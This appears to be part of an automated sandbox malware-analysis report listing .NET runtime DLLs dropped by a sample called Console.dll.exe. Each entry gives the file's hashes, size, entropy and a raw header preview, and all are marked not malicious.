                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.730279907185541
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:OKhZf8V1zoWxA5WzWWiy3WT56Os1HnhWgN7acWfyowcLK+X01k9z3AXq0p3rUFkW:ezocaWzWWib5kHRN7T6R9zSVCFkW
                                                                                                                                                                                                                        MD5:9C5AB49A940B296BB347A3E508B2F4D8
                                                                                                                                                                                                                        SHA1:F075FE7E3F89BA5899D46B42385E9188A837FE37
                                                                                                                                                                                                                        SHA-256:020CC1B6624E3A5E8AA326E29B1608A4A7B357D811B71AEF2945A324B400E825
                                                                                                                                                                                                                        SHA-512:92BD33588CF8BAA0552B598627CFB703402B6554828D72C23A9D058131F62C18804946FAE22F1237A4828B67F0ED3D6DF2A03089A2705DFF8B9AD251CD809F0E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....k..........." ..0..............*... ...@....... ....................................`.................................s*..O....@...................(...`......h)..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l...L...#~......<...#Strings............#US.........#GUID...........#Blob......................3................................................ ...........^.................D.d.....d...t.7.....d...Y.d.....d.....d.....d...@.d...r.d.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.OpenSsl.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15536
                                                                                                                                                                                                                        Entropy (8bit):6.821858176788977
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:NzsxAIX/9WASijRWi73WT56Os1HnhWgN7aIWfe5nPJKIjwX01k9z3ADZ72ka:4x/9WASijRWiq5kHRN79nwHR9zkZM
                                                                                                                                                                                                                        MD5:A66195F6DBFEC46AFDBF8FDDEADBED82
                                                                                                                                                                                                                        SHA1:D99C52FB1C4A307FC8DA017E9494041C55491B23
                                                                                                                                                                                                                        SHA-256:2FF3651C99468754B4BD74207520626B33A3EE47AEEB2C30435063834B7D2881
                                                                                                                                                                                                                        SHA-512:E1175831D060B2E3CCBDC97E95A464DB5CD8F0ADA7C858503AC3F4FD3B358336F6C39FC2400E28292CA0E69FC55178D3F3E7ABCA6C3958CC764FC30C140020B9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....m............" ..0..............)... ...@....... ...............................P....`..................................)..O....@...................(...`.......(..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~..X.......#Strings.... .......#US.$.......#GUID...4.......#Blob......................3..................................................|.....|...E.i.........p.....+.Q.....Q...[.J...q.Q...@.Q.....Q.....Q.....Q...'.Q...Y.Q.................c.....c.....c...).c...1.c...9.c...A.c...I.c...Q.c...Y.c...a.c...i.c...q.c...y.c.......................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Primitives.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.76547824987816
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:16P3FGxAzuWZ3Wis3WT56Os1HnhWgN7aIWfIZWXKIjwX01k9z3ADZ7RStwSm:EfaAuWZ3WiR5kHRN7dDHR9zkZYtwSm
                                                                                                                                                                                                                        MD5:F866EA93F6202B17AFAAC4F99534859B
                                                                                                                                                                                                                        SHA1:64DCD6C0180C252DCBE7E9D66C0DD69DFD9427E3
                                                                                                                                                                                                                        SHA-256:D6DD15C35ED4B88D35307E28520E25E3F7DABAC265807A4E06B28F98FE6D55C5
                                                                                                                                                                                                                        SHA-512:17F1C5E3697645C7F4EC58F6FECF943B088702F416F44B0AC67EC7A3455433021A08ADF8C6BF26C7114009C200BC866E9780175E006B2918851B1CD17C4FCD2E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0aJ..........." ..0.............v+... ...@....... ...............................g....`.................................#+..O....@...................(...`.......*..T............................................ ............... ..H............text...|.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................W+......H.......P ..D....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................................4...........r.................X.............(.........m.......................T.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.ProtectedData.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):36616
                                                                                                                                                                                                                        Entropy (8bit):6.53423105102043
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:6+7AJZv8x7FKI+ptTD9UYg7kKEHJ/i+9znHw:6+cJZvUFG75UYMEpi6zHw
                                                                                                                                                                                                                        MD5:1CE74054F19BB3ED027EB83EF5BC3393
                                                                                                                                                                                                                        SHA1:603FA56EC5D2F6AE14D3D4C8FB83B7C32C6629FA
                                                                                                                                                                                                                        SHA-256:5E04D6CFF3B6FE9706908970CD594861F0C08B3824F7827B2331B5F4FCEE1BD1
                                                                                                                                                                                                                        SHA-512:06E841B792F67029DCB42C71AA9B8107BE577018BC89B9E40B4809BDF546DD559D2BF74B7C73BCB3849CE8194421DCC1960ED4CC7B097587803B632FC2B639B9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,..........." ..0..Z..........Fy... ........... ....................................`..................................x..O.......(............f...)...........w..T............................................ ............... ..H............text...LY... ...Z.................. ..`.rsrc...(............\..............@..@.reloc...............d..............@..B................%y......H.......p'..,K...........r......dw.......................................0..(........(.......2.. ...._ ....`...s!...%.o"...*.~s...*..0..........(....,..*..(.....o#......&...*..............*....0...........(.......($...-..,..*.*.(....,.r...p......%...%...(%...*..(&...*.(....,.r...p......%...%...%...(%...*...('...*.(....,!r...p......%...%...%...%...(%...*....((...*..,&(....,..r...pr...p.(%...()...*..(*...*.*.(....,.r...p......%...%...(%...*...(+...*.(....,.r...p......%...%...%.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.X509Certificates.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17072
                                                                                                                                                                                                                        Entropy (8bit):6.7282788894006575
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:yw7HPbocGxAmdV+WLfWim3WT56Os1HnhWgN7aIWfY2JbTseUfX01k9z3AcgkS4tx:hHzocszdoWLfWin5kHRN7hK/6fR9zjgc
                                                                                                                                                                                                                        MD5:7F4E3F56E71A8E5FDBF91C07E0558077
                                                                                                                                                                                                                        SHA1:04334B0E05DA6F768E34E88B8F849A78AE9D4EB9
                                                                                                                                                                                                                        SHA-256:3D855F06F31029064A104A3C4049EFDF7AB61EB0CBC48167385A00C7C77C7DD2
                                                                                                                                                                                                                        SHA-512:895AB80B0A6A6078130FE7258E50FF5A8E479467EA08E2EAA62F730C0AD40DDAEFB263D547BE6E1AA09DA9F48DA18AD48EDA716CAEBA8A5D8230399C838A81E7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....XJ..........." ..0............../... ...@....... ..............................^.....`.................................s/..O....@..D................(...`......X...T............................................ ............... ..H............text........ ...................... ..`.rsrc...D....@......................@..@.reloc.......`......................@..B................./......H.......P .......................-......................................BSJB............v4.0.30319......l.......#~......T...#Strings............#US.........#GUID...........#Blob......................3................................-.....r...............'...................X.....k.....k...........k.....k...i.k...&.k...C.k.....k.....k.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1792176
                                                                                                                                                                                                                        Entropy (8bit):6.759747526634536
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:ixqlPJhSud/+K11F1VVWZIiz97ZRdGrjEswdiroSSrmeyBoIW2vA172Ux+d9gRMa:ZP5tCnPuK
                                                                                                                                                                                                                        MD5:7D245BB1D1DB5CDA851185BFB404CB7C
                                                                                                                                                                                                                        SHA1:1DB9C32A2A85B53DD61E5D6EB7C9F2DE5D4517D1
                                                                                                                                                                                                                        SHA-256:E9DA2F779E3EC441063D080304693F32561DF0A947930E0E27A32E2AF0E2AF61
                                                                                                                                                                                                                        SHA-512:6DE46FC0B7D0AE4DDF4216592D8FBA2AB8370C4E9CEBEE43FFABC1BE3FCABD3B9DE033E39D08F4598DBAC79DFBCB458F4C0A6DD68B656CF675E86A4BF383E4BB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....9............!.........@....................@..........................0............@.....................................................h~...0...(... ......|...p...............................................................H............text............................... ..`.data....&.......0..................@....reloc....... ....... ..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Permissions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):92536
                                                                                                                                                                                                                        Entropy (8bit):6.1674565969059065
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:MOL/mLfHu4bKQI8qWMbnFMRyWBLa+o6jcxbgbfW:efpKQI8LMjFMzBLa+o6jtK
                                                                                                                                                                                                                        MD5:3A92C18C24D85F60F23BECD852F1510A
                                                                                                                                                                                                                        SHA1:F8EED1FAD4218F32A1251FAC65D42DBED903FC77
                                                                                                                                                                                                                        SHA-256:74EF3B67960A9B569FED9AC457157769DBFE433B0F4FA13C52167C2246BFED71
                                                                                                                                                                                                                        SHA-512:BACDF908AD5A92577EB12EF3A7342B8D4DAC67C5D8FDEEEAE044677D0D35DB64CAF9878C1F1B96F30549849AF3351588AA5271C1C6D2B6003658554E553D4911
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0..<...........[... ...`....... ....................................`..................................[..O....`...............F..x#..........8Z..T............................................ ............... ..H............text....;... ...<.................. ..`.rsrc........`.......>..............@..@.reloc...............D..............@..B................b[......H.......(J..0...........XU..`....Y........................................(....*..(....*2.(....s....z..*..*..*.s....z..*.0..1.......(....,..%-.&.*..(.....o ......&...,...o!...,..*.*....................(....,.r...p......%...%...("...*..(#...*.(....,.r...p......%...%...%...("...*...($...*.(....,!r...p......%...%...%...%...("...*....(%...*..,&(....,..r...pr...p.("...(&...*..('...*.*.(....,.r...p......%...%...("...*...((...*.(....,.r...p......%...%...%...("...*....()...*.(....,"r

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Principal.Windows.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):166064
                                                                                                                                                                                                                        Entropy (8bit):6.523517371392543
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:irkjxXXBA92ETlJYrtEyQoLi1MpqU4uvT+ym44:ieXBA92YYr2RoLBqUrB4
                                                                                                                                                                                                                        MD5:E00DD6F12CC8CE971BA82C3151A55851
                                                                                                                                                                                                                        SHA1:3162E87E079BD5216C7CB57DA39F4D12A4069DCF
                                                                                                                                                                                                                        SHA-256:566B33A0D10FB2085F43C5D17EA45119149A11149FFFCCC3ABB9F7164BCCED11
                                                                                                                                                                                                                        SHA-512:9070038E34330C12AB70BE876FAA64DD6C51141F63FE5ABC1B017EC76DBBBD81852D491B818F7FE36BF7506E9F83ACC3D11647013915393F7FBE66BB50D7566E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.W............!.........@............... ....@..........................`......\.....@..................................................1..X....`...(...@..$...L...p...............................................................H............text...Q........................... ..`.data...=.... ... ... ..............@....reloc..$....@... ...@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Principal.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15640
                                                                                                                                                                                                                        Entropy (8bit):6.7943237440162
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:DB0LTPxAkF3jWVNfWipWB3WT56Os1HnhWgN7acWfw9YKDUX01k9z3AeOufh:eLT5pWPfWi4E5kHRN7HypR9zNHfh
                                                                                                                                                                                                                        MD5:D8D6D742D9047E8FECB73370A8FFBFF7
                                                                                                                                                                                                                        SHA1:70D233C4D91B87005727FAAD1086DE32F8EF6F1A
                                                                                                                                                                                                                        SHA-256:54729E6D91F88A3D53B9A67F020B4D34EF817136960DC73492EE38FEC9298B8E
                                                                                                                                                                                                                        SHA-512:840684F411EBC4EEFA82006EB946437678C88DD3E7D4E13E2BB5887742DC12D21D9E3DDF1E324E527B1BF23316763477A15140F3876991F07C74902C0D743D47
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............j)... ...@....... ....................................`..................................)..O....@...................)...`......$(..T............................................ ............... ..H............text...p.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................K)......H.......P ..T....................'......................................BSJB............v4.0.30319......l.......#~..4.......#Strings............#US.........#GUID...........#Blob......................3..................................................=...x.=...3.*...].....^.................I....._.................w.................G...................$.....$.....$...).$...1.$...9.$...A.$...I.$...Q.$...Y.$...a.$...i.$...q.$...y.$.......................#.....+.:...+.P...3.f...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.SecureString.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15632
                                                                                                                                                                                                                        Entropy (8bit):6.8186885464730675
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:/1rhaDWk3Wi5Tb2HRN7kXkXC4deR9zZjmNbn:traN/i8kXC4dC9zZjyb
                                                                                                                                                                                                                        MD5:BD7668E3E3BB5BED450A16CEB52D8DA5
                                                                                                                                                                                                                        SHA1:48ABADF41D015BA4ADFF2EC43BC699651F1B3C0A
                                                                                                                                                                                                                        SHA-256:2DCA9D50C79662BA5AECEDAAD568F75E501400F4B857F56A33D651FF3594EF5A
                                                                                                                                                                                                                        SHA-512:3835257C197624699E2F1CCCCCF2617B6FD90600C326D90DDE8B355FDFE46118F050C09F635DA15AF23A539BB400B974C9424365B7857076E480AB754D239066
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z+............" ..0..............)... ...@....... ..............................vk....`..................................)..O....@...................)...`.......(..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~..D.......#Strings............#US.........#GUID...$.......#Blob......................3............................................................3.Z.........^.......B.....B...n.;.....m.....m.....B...S.B.....B...w.B.....B...:.B...G.B.................T.....T.....T...).T...1.T...9.T...A.T...Q.T. .Y.T...a.T...i.T...q.T...y.T.....T.....T.......................#.....+.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):18592
                                                                                                                                                                                                                        Entropy (8bit):6.5077675712522085
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:UW7XHkE3jDvupZFiVyJL6xAXj3WhDWiuouWXebPpUNTQHnhWgN7acWtL3t/owcLl:3ImMj3WhDWiuoTb2HRN7SpD6R9zSq
                                                                                                                                                                                                                        MD5:1A54409493B36B54F47DB33FE7ACAEA4
                                                                                                                                                                                                                        SHA1:C7C965E18A0A0A553B07A02A24B5C5FBCD405DEA
                                                                                                                                                                                                                        SHA-256:9DDE8736C61E8003E3BBB1921012EDF03942437E6DBD75CCE61E81AAD74D3EF1
                                                                                                                                                                                                                        SHA-512:DF5CF0525B46C8C9C07A1C8D1DF15038E634E52BCD04D1BE2F29E3AF232794B7AC3C3D2DD385A8AD25BCA27C9474A5B055435AD0B52ADD369F408CA712711E8D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n0............" ..0..............4... ...@....... ...............................D....`..................................3..O....@..T............ ...(...`.......2..T............................................ ............... ..H............text........ ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................3......H.......P ......................P2......................................BSJB............v4.0.30319......l...H...#~..........#Strings....h.......#US.l.......#GUID...|.......#Blob......................3................................O.....................0...........3.......x..... ..... ........... ..... ...r. ..... ...*. ..... ..... .................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.C...+.Y...3.o...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ServiceModel.Web.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):17056
                                                                                                                                                                                                                        Entropy (8bit):6.62897101810661
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:24n7pWDWJ5WiCuWXebPpUNTQHnhWgN7aIWaIbTseUfX01k9z3AcgkSNbvn:LyWJ5WiCTb2HRN73I/6fR9zjgr7
                                                                                                                                                                                                                        MD5:A13EA18B0129DAE67756E5C5E0F6CBAB
                                                                                                                                                                                                                        SHA1:50ECF19AFCDF78E89ED31C01DB35A80E52A54FF3
                                                                                                                                                                                                                        SHA-256:4D9F7B601BB4E68EDA2CB7A261AE9AE4994A2207C51AF08A7C09C94A38D65B56
                                                                                                                                                                                                                        SHA-512:CFEE8663C2424FF0D9FF2C369B16168296A603D04A32F9064348F57E47B518ADD20DBD76238E8F2D7B5F894219BE97949EE580A7408C1A645A4FDE3139100D74
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ...@....... ....................................`.................................7...O....@...................(...`......H-..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................k.......H.......P ..x....................,......................................BSJB............v4.0.30319......l.......#~..8.......#Strings............#US.........#GUID...........#Blob......................3................................&.....................?.................%.].....................&.................>.....[...................{...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.C...+.Y...3.o...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ServiceProcess.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.741843752911456
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:5N+OVxAwipWnRlpFWiOH3WT56Os1HnhWgN7akWfpFwdybowcLK+X01k9z3AXqn2J:DL+pWnRlpFWi35kHRN7Qkm6R9zSl
                                                                                                                                                                                                                        MD5:3F3DCF75EFDDAA6CC606747726BA04A9
                                                                                                                                                                                                                        SHA1:D534FB8BADB5F6D38F3805DB5C14474962AAC403
                                                                                                                                                                                                                        SHA-256:3A755FEA74C6C50DF6A01A6BA9284CF5668B147A8EDEB1F8F16079739FDC8310
                                                                                                                                                                                                                        SHA-512:F7E7D9D2643272AA90DDF4EAEA073A3F5076E722159A8695CD98A71ECFCA7FA1DF7444395605D6647BAAFA337818C12CAF51368EEB1A21FC76FA78869AEDB71F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............+... ...@....... ...................................`.................................;+..O....@...................(...`......P*..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................o+......H.......P .......................)......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3......................................!.........f...........\.....:...........B.^...H.^.....;.....^.....^...+.^.....^.....^.....^...p.^.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y.........................#.....+.C...+.Y...3.o...;.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.CodePages.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):858376
                                                                                                                                                                                                                        Entropy (8bit):7.478229562824376
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:MP7xn7kZQ6kliVreJIHHr0tRYbKr2KtG9VKABC6rPJWd7gTXOnA:MT9km6k/IwRYbiBeKGCaWdkLqA
                                                                                                                                                                                                                        MD5:D7401CC8BB4319293E83484CA5719B26
                                                                                                                                                                                                                        SHA1:CE0B2ABB627509A2AB83CC257DB386DA78EF398C
                                                                                                                                                                                                                        SHA-256:53DFBDD9C349944758CD7343D10003596EC2A9A80D42AA5A3E80987F25365158
                                                                                                                                                                                                                        SHA-512:F7266D4EB7E186DF7CC2C1E34A39187CCA76D3DB1608CE47C6A6A526F63687DCEB26D7798B273D663066BF4546D284C04C1498632800AF552039C227D0B859ED
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R.............!.........@....................@.................................:I....@.................................................X5...........)..........,...p...............................................................H............text...U........................... ..`.data............ ..................@....reloc........... ..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.Extensions.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.721174530040773
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:Gx8KWxJWikTb2HRN7z5TNbZR9z3E4nMGA:TNK/iZFT9z04MP
                                                                                                                                                                                                                        MD5:1C332D9A63A04B59EA2A5AB3B5A42E79
                                                                                                                                                                                                                        SHA1:20939CAEA2E1B007A4E414961EAA4A91BB02590E
                                                                                                                                                                                                                        SHA-256:2B7AF3FEBAC37F88EDE6A62246FBC35E34C5BB8AA443B737B84C5023E6BECCEF
                                                                                                                                                                                                                        SHA-512:21D70E1AF988C761EA8C206027FBCBF8B75F1A9235D9618A9BFC16D66ADB847FB00DB66CAEE5076E14B2DFDC94251A05DEB58FFB5F5C47C1EF3977EF6724E28D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?..........."!..0.............N*... ........@.. ....................................`..................................)..L....@...................)...`.......(..T............................................ ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0*......H........ ..,...................P .........................................!.A.*S1&.d)Y..0.\......xB.V...I.j.......|... .B..Z..;.[VP......ni.=....Fr./)...L.c...TOFS...o.sr.o....-..../.KG{.\..BSJB............v4.0.30319......`.......#~..`... ...#Strings............#GUID...........#Blob......................3......................................O........."...........;...........f.!...!.z.....z.....s.........;.......z...[.z.....z.....z.....z...B.z...O.z...v.............

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.dll

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.717936667901732
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:ozk1xAagWLYNWijuWXebPpUNTQHnhWgN7acWwBNVAv+cQ0GX01k9z3ApyBE4nxvy:RmWMNWijTb2HRN7NNbZR9z3E4n5QMG
                                                                                                                                                                                                                        MD5:BF6EA44CAE6553440BC5F7F3D9FA4113
                                                                                                                                                                                                                        SHA1:77532CD84DB4ECECA5AA1A5AF345D754C58FBFC6
                                                                                                                                                                                                                        SHA-256:FB1B653BC1A435160426B005B59B1D7B35018E3BA3029AE45264DE91F2986BC9
                                                                                                                                                                                                                        SHA-512:4155BC8025B8FB2DB7FE62932423FC4247F8D76C98F923956D3147B218F13BF426906D01598847E0D9711B3493734D532A72BAE5997701678592FE79F0202B20
                                                                                                                                                                                                                        Malicious:false
